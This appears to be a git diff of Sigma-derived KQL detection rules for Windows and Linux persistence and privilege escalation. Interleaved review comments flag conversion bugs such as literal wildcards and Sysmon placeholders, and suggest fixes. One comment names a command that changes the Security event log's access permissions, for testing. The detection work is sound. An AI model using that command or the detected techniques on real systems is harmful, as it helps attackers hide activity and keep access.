+++ b/KQL/rules/Privilege Escalation/user_added_to_root_sudoers_group_using_usermod.kql
@@ -1,12 +1,12 @@
-// Title: User Added To Root/Sudoers Group Using Usermod
-// Author: TuanLe (GTSC)
-// Date: 2022-12-21
-// Level: medium
-// Description: Detects usage of the "usermod" binary to add users add users to the root or suoders groups
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence
-// False Positives:
-// - Legitimate administrator activities
-
-DeviceProcessEvents
+// Title: User Added To Root/Sudoers Group Using Usermod
+// Author: TuanLe (GTSC)
+// Date: 2022-12-21
+// Level: medium
+// Description: Detects usage of the "usermod" binary to add users add users to the root or suoders groups
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence
+// False Positives:
+// - Legitimate administrator activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-aG root" or ProcessCommandLine contains "-aG sudoers") and FolderPath endswith "/usermod"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/using_settingsynchost_exe_as_lolbin.kql b/KQL/rules/Privilege Escalation/using_settingsynchost_exe_as_lolbin.kql
index 14a52d18..2f652946 100644
--- a/KQL/rules/Privilege Escalation/using_settingsynchost_exe_as_lolbin.kql
+++ b/KQL/rules/Privilege Escalation/using_settingsynchost_exe_as_lolbin.kql
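Review bot: The new `| where` line only matches the exact spelling `-aG root` / `-aG sudoers`, so `usermod -a -G root`, `usermod -G root` (which also replaces the user's supplementary groups), `--append --groups root` and the more common `-aG sudo` / `-aG wheel` all slip past; on most distributions there is no `sudoers` group at all, so the second literal is unlikely to ever fire. A regex on the flag and group is short and covers these variants: `| where FolderPath endswith "/usermod" and ProcessCommandLine matches regex @"(?i)(-a\s*-G|-aG|--append\s+--groups|--groups|-G)\s+(root|sudo|wheel|sudoers)\b"`. The description line also has a typo, "add users add users to the root or suoders groups", that is worth fixing while the file is being regenerated.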
@@ -1,10 +1,10 @@
-// Title: Using SettingSyncHost.exe as LOLBin
-// Author: Anton Kutepov, oscd.community
-// Date: 2020-02-05
-// Level: high
-// Description: Detects using SettingSyncHost.exe to run hijacked binary
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.defense-evasion, attack.t1574.008
-
-DeviceProcessEvents
+// Title: Using SettingSyncHost.exe as LOLBin
+// Author: Anton Kutepov, oscd.community
+// Date: 2020-02-05
+// Level: high
+// Description: Detects using SettingSyncHost.exe to run hijacked binary
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.defense-evasion, attack.t1574.008
+
+DeviceProcessEvents
 | where (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) and (InitiatingProcessCommandLine contains "cmd.exe /c" and InitiatingProcessCommandLine contains "RoamDiag.cmd" and InitiatingProcessCommandLine contains "-outputpath")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/vbscript_payload_stored_in_registry.kql b/KQL/rules/Privilege Escalation/vbscript_payload_stored_in_registry.kql
index c545c7c2..96af8950 100644
--- a/KQL/rules/Privilege Escalation/vbscript_payload_stored_in_registry.kql
+++ b/KQL/rules/Privilege Escalation/vbscript_payload_stored_in_registry.kql
@@ -1,10 +1,10 @@
-// Title: VBScript Payload Stored in Registry
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-03-05
-// Level: high
-// Description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
-
-DeviceRegistryEvents
+// Title: VBScript Payload Stored in Registry
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-05
+// Level: high
+// Description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+
+DeviceRegistryEvents
 | where ((RegistryValueData contains "vbscript:" or RegistryValueData contains "jscript:" or RegistryValueData contains "mshtml," or RegistryValueData contains "RunHTMLApplication" or RegistryValueData contains "Execute(" or RegistryValueData contains "CreateObject" or RegistryValueData contains "window.close") and RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion") and (not((RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ((RegistryValueData contains "\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll" or RegistryValueData contains "<\\Microsoft.mshtml,fileVersion=" or RegistryValueData contains "_mshtml_dll_" or RegistryValueData contains "<\\Microsoft.mshtml,culture=") and InitiatingProcessFolderPath endswith "\\msiexec.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData*"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/whoami_exe_execution_from_privileged_process.kql b/KQL/rules/Privilege Escalation/whoami_exe_execution_from_privileged_process.kql
index 3b7b7f7f..03c0e219 100644
--- a/KQL/rules/Privilege Escalation/whoami_exe_execution_from_privileged_process.kql
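Review bot: The msiexec exclusion at the end of the new `| where` line, `RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData*"`, keeps a literal asterisk that was clearly a Sigma wildcard; KQL `endswith` has no wildcard semantics, so no key ever satisfies it and the whole `Microsoft.mshtml` installer filter is dead code. The practical effect is that every MSI that registers the mshtml interop assembly will raise a high-severity alert for this rule. Replacing that term with `RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\"` restores the intended exclusion. A quick grep of the generated tree for `*"` inside `endswith`/`startswith` would show whether the backend drops wildcards elsewhere too.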
+++ b/KQL/rules/Privilege Escalation/whoami_exe_execution_from_privileged_process.kql
@@ -1,10 +1,10 @@
-// Title: Whoami.EXE Execution From Privileged Process
-// Author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov
-// Date: 2022-01-28
-// Level: high
-// Description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.discovery, attack.t1033
-
-DeviceProcessEvents
+// Title: Whoami.EXE Execution From Privileged Process
+// Author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov
+// Date: 2022-01-28
+// Level: high
+// Description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.discovery, attack.t1033
+
+DeviceProcessEvents
 | where (ProcessVersionInfoOriginalFileName =~ "whoami.exe" or FolderPath endswith "\\whoami.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI" or AccountName contains "TrustedInstaller")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql b/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql
index e55b9cc6..51ce5ddf 100644
--- a/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql
+++ b/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql
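Review bot: The account test on the new `| where` line, `AccountName contains "AUTHORI" or AccountName contains "AUTORI"`, was written for a `User` field of the form `NT AUTHORITY\SYSTEM`; in `DeviceProcessEvents` the domain is, to my knowledge, split out into `AccountDomain` and `AccountName` holds only the bare name such as `system`, so these two terms would never match and only the `TrustedInstaller` branch survives. The locale-independent and schema-safe form is to key on the well-known SIDs: `and (AccountSid in ("S-1-5-18", "S-1-5-19", "S-1-5-20") or AccountDomain contains "AUTHORI" or AccountDomain contains "AUTORI" or AccountName contains "TrustedInstaller")`. That keeps the original coverage of SYSTEM, LOCAL SERVICE and NETWORK SERVICE regardless of display language, and is worth confirming against a real `whoami` run as SYSTEM on an onboarded host.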
@@ -1,12 +1,12 @@
-// Title: Windows Event Log Access Tampering Via Registry
-// Author: X__Junior
-// Date: 2025-01-16
-// Level: high
-// Description: Detects changes to the Windows EventLog channel permission values. It focuses on changes to the Security Descriptor Definition Language (SDDL) string, as modifications to these values can restrict access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel. Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1547.001, attack.t1112
-// False Positives:
-// - Administrative activity, still unlikely
-
-DeviceRegistryEvents
+// Title: Windows Event Log Access Tampering Via Registry
+// Author: X__Junior
+// Date: 2025-01-16
+// Level: high
+// Description: Detects changes to the Windows EventLog channel permission values. It focuses on changes to the Security Descriptor Definition Language (SDDL) string, as modifications to these values can restrict access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel. Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1547.001, attack.t1112
+// False Positives:
+// - Administrative activity, still unlikely
+
+DeviceRegistryEvents
 | where ((RegistryKey endswith "\\SYSTEM\\CurrentControlSet\\Services\\EventLog*" and RegistryKey endswith "\\CustomSD") or ((RegistryKey endswith "\\Policies\\Microsoft\\Windows\\EventLog*" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels") and RegistryKey endswith "\\ChannelAccess")) and (RegistryValueData contains "D:(D;" or (RegistryValueData contains "D:(" and RegistryValueData contains ")(D;")) and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe"))) and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/windows_terminal_profile_settings_modification_by_uncommon_process.kql b/KQL/rules/Privilege Escalation/windows_terminal_profile_settings_modification_by_uncommon_process.kql
index d27ceae5..1a04b77d 100644
--- a/KQL/rules/Privilege Escalation/windows_terminal_profile_settings_modification_by_uncommon_process.kql
+++ b/KQL/rules/Privilege Escalation/windows_terminal_profile_settings_modification_by_uncommon_process.kql
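Review bot: The first branch of the new `| where` line, `RegistryKey endswith "\\SYSTEM\\CurrentControlSet\\Services\\EventLog*" and RegistryKey endswith "\\CustomSD"`, can never be true: the `*` is a Sigma wildcard emitted as a literal character, and no string ends with both `EventLog*` and `\CustomSD`, so the classic `CustomSD` tampering path this rule is named for is dead; the `\\Policies\\Microsoft\\Windows\\EventLog*` term in the second branch has the same literal-asterisk problem and only the `WINEVT\\Channels` path remains live. On top of that, `CustomSD` and `ChannelAccess` are value names, which in the MDE schema are, as far as I know, reported in `RegistryValueName` rather than appended to `RegistryKey`. I would rewrite the key portion as `| where ((RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\" and RegistryValueName =~ "CustomSD") or ((RegistryKey contains "\\Policies\\Microsoft\\Windows\\EventLog\\" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels") and RegistryValueName =~ "ChannelAccess"))` and keep the SDDL `D:(D;` checks and the TrustedInstaller/TiWorker exclusions as they are. Given the rule is rated high, it deserves a positive test with `wevtutil sl Security /ca:<sddl>` before it ships.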
@@ -1,12 +1,12 @@
-// Title: Windows Terminal Profile Settings Modification By Uncommon Process
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-07-22
-// Level: medium
-// Description: Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.015
-// False Positives:
-// - Some false positives may occur with admin scripts that set WT settings.
-
-DeviceFileEvents
+// Title: Windows Terminal Profile Settings Modification By Uncommon Process
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-22
+// Level: medium
+// Description: Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.015
+// False Positives:
+// - Some false positives may occur with admin scripts that set WT settings.
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") and FolderPath endswith "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\LocalState\\settings.json"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/winekey_registry_modification.kql b/KQL/rules/Privilege Escalation/winekey_registry_modification.kql
index b75ed32e..dce118d6 100644
--- a/KQL/rules/Privilege Escalation/winekey_registry_modification.kql
+++ b/KQL/rules/Privilege Escalation/winekey_registry_modification.kql
@@ -1,10 +1,10 @@
-// Title: WINEKEY Registry Modification
-// Author: omkar72
-// Date: 2020-10-30
-// Level: high
-// Description: Detects potential malicious modification of run keys by winekey or team9 backdoor
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547
-
-DeviceRegistryEvents
+// Title: WINEKEY Registry Modification
+// Author: omkar72
+// Date: 2020-10-30
+// Level: high
+// Description: Detects potential malicious modification of run keys by winekey or team9 backdoor
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547
+
+DeviceRegistryEvents
 | where RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Backup Mgr"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql b/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql
index d06cabcd..d57db568 100644
--- a/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql
+++ b/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql
@@ -1,11 +1,11 @@
-// Title: Winlogon Notify Key Logon Persistence
-// Author: frack113
-// Date: 2021-12-30
-// Level: high
-// Description: Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.
-// Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.004
-
-DeviceRegistryEvents
+// Title: Winlogon Notify Key Logon Persistence
+// Author: frack113
+// Date: 2021-12-30
+// Level: high
+// Description: Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.
+// Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.004
+
+DeviceRegistryEvents
 | where RegistryValueData endswith ".dll" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\logon"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql b/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql
index eece0e6e..8a1dea3f 100644
--- a/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql
+++ b/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql
@@ -1,11 +1,11 @@
-// Title: WinRAR Creating Files in Startup Locations
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-07-16
-// Level: high
-// Description: Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder.
-// This kind of behaviour has been associated with exploitation of WinRAR path traversal vulnerability CVE-2025-6218 or CVE-2025-8088.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
-
-DeviceFileEvents
+// Title: WinRAR Creating Files in Startup Locations
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-07-16
+// Level: high
+// Description: Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder.
+// This kind of behaviour has been associated with exploitation of WinRAR path traversal vulnerability CVE-2025-6218 or CVE-2025-8088.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\WinRAR.exe" or InitiatingProcessFolderPath endswith "\\Rar.exe") and FolderPath contains "\\Start Menu\\Programs\\Startup\\"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/winsock2_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/winsock2_autorun_keys_modification.kql
index 832f972c..6148dd5c 100644
--- a/KQL/rules/Privilege Escalation/winsock2_autorun_keys_modification.kql
+++ b/KQL/rules/Privilege Escalation/winsock2_autorun_keys_modification.kql
@@ -1,13 +1,13 @@
-// Title: WinSock2 Autorun Keys Modification
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019-10-25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
-// False Positives:
-// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
-// - Legitimate administrator sets up autorun keys for legitimate reason
-
-DeviceRegistryEvents
+// Title: WinSock2 Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\System\\CurrentControlSet\\Services\\WinSock2\\Parameters" and (RegistryKey contains "\\Protocol_Catalog9\\Catalog_Entries" or RegistryKey contains "\\NameSpace_Catalog5\\Catalog_Entries") and (not((RegistryValueData =~ "(Empty)" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\MsiExec.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\syswow64\\MsiExec.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/wmi_backdoor_exchange_transport_agent.kql b/KQL/rules/Privilege Escalation/wmi_backdoor_exchange_transport_agent.kql
index db4f03e4..d94dee0b 100644
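Review bot: The exclusion `RegistryValueData =~ "(Empty)"` on the new `| where` line is Sysmon's placeholder text for an empty `Details` field; MDE does not, to my knowledge, emit that literal, so the intent of the original rule (ignore key creations and deletions that carry no data) is lost and this rule will alert on every catalog-entry key touch. The portable form is `isempty(RegistryValueData)`, i.e. `and (not((isempty(RegistryValueData) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\MsiExec.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\syswow64\\MsiExec.exe")))`. If the converter maps Sigma's `Details: '(Empty)'` mechanically, it would be better to special-case it there so the other split ASEP rules in this commit get the same fix.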
--- a/KQL/rules/Privilege Escalation/wmi_backdoor_exchange_transport_agent.kql
+++ b/KQL/rules/Privilege Escalation/wmi_backdoor_exchange_transport_agent.kql
@@ -1,10 +1,10 @@
-// Title: WMI Backdoor Exchange Transport Agent
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-10-11
-// Level: critical
-// Description: Detects a WMI backdoor in Exchange Transport Agents via WMI event filters
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.003
-
-DeviceProcessEvents
+// Title: WMI Backdoor Exchange Transport Agent
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-11
+// Level: critical
+// Description: Detects a WMI backdoor in Exchange Transport Agents via WMI event filters
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.003
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\EdgeTransport.exe" and (not((FolderPath =~ "C:\\Windows\\System32\\conhost.exe" or (FolderPath endswith "\\Bin\\OleConverter.exe" and FolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/wmi_persistence_command_line_event_consumer.kql b/KQL/rules/Privilege Escalation/wmi_persistence_command_line_event_consumer.kql
index f19ea27b..467affdb 100644
--- a/KQL/rules/Privilege Escalation/wmi_persistence_command_line_event_consumer.kql
+++ b/KQL/rules/Privilege Escalation/wmi_persistence_command_line_event_consumer.kql
@@ -1,12 +1,12 @@
-// Title: WMI Persistence - Command Line Event Consumer
-// Author: Thomas Patzke
-// Date: 2018-03-07
-// Level: high
-// Description: Detects WMI command line event consumers
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.t1546.003, attack.persistence
-// False Positives:
-// - Unknown (data set is too small; further testing needed)
-
-DeviceImageLoadEvents
+// Title: WMI Persistence - Command Line Event Consumer
+// Author: Thomas Patzke
+// Date: 2018-03-07
+// Level: high
+// Description: Detects WMI command line event consumers
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1546.003, attack.persistence
+// False Positives:
+// - Unknown (data set is too small; further testing needed)
+
+DeviceImageLoadEvents
 | where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe" and FolderPath endswith "\\wbemcons.dll"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/wmi_persistence_script_event_consumer_file_write.kql b/KQL/rules/Privilege Escalation/wmi_persistence_script_event_consumer_file_write.kql
index 1d2e28ed..14818dbc 100644
--- a/KQL/rules/Privilege Escalation/wmi_persistence_script_event_consumer_file_write.kql
+++ b/KQL/rules/Privilege Escalation/wmi_persistence_script_event_consumer_file_write.kql
@@ -1,12 +1,12 @@
-// Title: WMI Persistence - Script Event Consumer File Write
-// Author: Thomas Patzke
-// Date: 2018-03-07
-// Level: high
-// Description: Detects file writes of WMI script event consumer
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.t1546.003, attack.persistence
-// False Positives:
-// - Dell Power Manager (C:\Program Files\Dell\PowerManager\DpmPowerPlanSetup.exe)
-
-DeviceFileEvents
+// Title: WMI Persistence - Script Event Consumer File Write
+// Author: Thomas Patzke
+// Date: 2018-03-07
+// Level: high
+// Description: Detects file writes of WMI script event consumer
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1546.003, attack.persistence
+// False Positives:
+// - Dell Power Manager (C:\Program Files\Dell\PowerManager\DpmPowerPlanSetup.exe)
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/wow6432node_classes_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/wow6432node_classes_autorun_keys_modification.kql
index bb60f6e9..45ea6561 100644
--- a/KQL/rules/Privilege Escalation/wow6432node_classes_autorun_keys_modification.kql
+++ b/KQL/rules/Privilege Escalation/wow6432node_classes_autorun_keys_modification.kql
@@ -1,13 +1,13 @@
-// Title: Wow6432Node Classes Autorun Keys Modification
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019-10-25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
-// False Positives:
-// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
-// - Legitimate administrator sets up autorun keys for legitimate reason
-
-DeviceRegistryEvents
+// Title: Wow6432Node Classes Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\Software\\Wow6432Node\\Classes" and (RegistryKey contains "\\Folder\\ShellEx\\ExtShellFolderViews" or RegistryKey contains "\\Folder\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\Folder\\ShellEx\\ColumnHandlers" or RegistryKey contains "\\Directory\\Shellex\\DragDropHandlers" or RegistryKey contains "\\Directory\\Shellex\\CopyHookHandlers" or RegistryKey contains "\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance" or RegistryKey contains "\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance" or RegistryKey contains "\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance" or RegistryKey contains "\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance" or RegistryKey contains "\\AllFileSystemObjects\\ShellEx\\DragDropHandlers" or RegistryKey contains "\\ShellEx\\PropertySheetHandlers" or RegistryKey contains "\\ShellEx\\ContextMenuHandlers") and (not(RegistryValueData =~ "(Empty)"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/wow6432node_currentversion_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/wow6432node_currentversion_autorun_keys_modification.kql
index 2d3ba19d..da42fd2d 100644
--- a/KQL/rules/Privilege Escalation/wow6432node_currentversion_autorun_keys_modification.kql
+++ b/KQL/rules/Privilege Escalation/wow6432node_currentversion_autorun_keys_modification.kql
@@ -1,13 +1,13 @@
-// Title: Wow6432Node CurrentVersion Autorun Keys Modification
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019-10-25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
-// False Positives:
-// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
-// - Legitimate administrator sets up autorun keys for legitimate reason
-
-DeviceRegistryEvents
+// Title: Wow6432Node CurrentVersion Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
 | where (RegistryKey contains "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey endswith "\\Run*" or RegistryKey endswith "\\RunOnce*" or RegistryKey endswith "\\RunOnceEx*" or RegistryKey endswith "\\RunServices*" or RegistryKey endswith "\\RunServicesOnce*" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects")) and (not(((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessFolderPath contains "\\setup.exe") or RegistryValueData =~ "(Empty)" or RegistryValueData startswith "\"C:\\ProgramData\\Package Cache\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\windowsdesktop-runtime-" or (InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and RegistryKey endswith "\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run*") or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "\\Explorer\\Browser Helper Objects") or (RegistryValueData endswith " /burn.runonce" and (InitiatingProcessFolderPath contains "\\winsdksetup.exe" or InitiatingProcessFolderPath contains "\\windowsdesktop-runtime-" or InitiatingProcessFolderPath contains "\\AspNetCoreSharedFrameworkBundle-") and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache" or InitiatingProcessFolderPath 
